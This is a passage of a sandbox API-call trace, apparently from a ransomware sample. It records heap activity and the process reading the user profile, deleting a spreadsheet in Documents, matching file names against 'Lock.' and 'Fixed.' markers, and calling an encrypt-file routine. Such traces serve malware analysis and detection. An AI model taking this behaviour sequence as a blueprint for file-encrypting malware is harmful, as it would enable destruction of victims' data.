hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.736] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.736] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e558d8 [0259.737] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/9mu- e5Z.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\9mu- e5Z.xlsx", lpFilePart=0x8cedf4*="9mu- e5Z.xlsx") returned 0x27 [0259.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.737] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\9mu- e5Z.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\9mu- e5z.xlsx")) returned 0x20 [0259.737] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\9mu- e5Z.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d66ea0, ftCreationTime.dwHighDateTime=0x1d5e682, ftLastAccessTime.dwLowDateTime=0x2a9d9ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a4, ftLastWriteTime.dwLowDateTime=0x2a9d9ec0, ftLastWriteTime.dwHighDateTime=0x1d5e4a4, nFileSizeHigh=0x0, nFileSizeLow=0x42be, dwReserved0=0x1, dwReserved1=0x1c, cFileName="9mu- e5Z.xlsx", cAlternateFileName="9MU-E5~1.XLS")) returned 0xa87510 [0259.737] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\9mu- e5Z.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\9mu- e5z.xlsx")) returned 1 [0259.744] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d66ea0, ftCreationTime.dwHighDateTime=0x1d5e682, ftLastAccessTime.dwLowDateTime=0x2a9d9ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a4, ftLastWriteTime.dwLowDateTime=0x2a9d9ec0, ftLastWriteTime.dwHighDateTime=0x1d5e4a4, nFileSizeHigh=0x0, nFileSizeLow=0x42be, dwReserved0=0x1, dwReserved1=0x1c, cFileName="9mu- e5Z.xlsx", cAlternateFileName="9MU-E5~1.XLS")) returned 0 [0259.744] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0259.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.744] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.744] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e558d8 [0259.745] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/9mu- e5Z.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\9mu- e5Z.xlsx", lpFilePart=0x8cf650*="9mu- e5Z.xlsx") returned 0x27 [0259.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.745] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\9mu- e5Z.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\9mu- e5z.xlsx")) returned 0xffffffff [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BDml_a2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dml_a2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ml_a2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l_a2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_a2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zV.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0259.747] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BDml_a2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dml_a2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ml_a2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l_a2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_a2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zV.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0259.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0259.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.749] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0259.749] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0259.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.749] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0259.750] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) 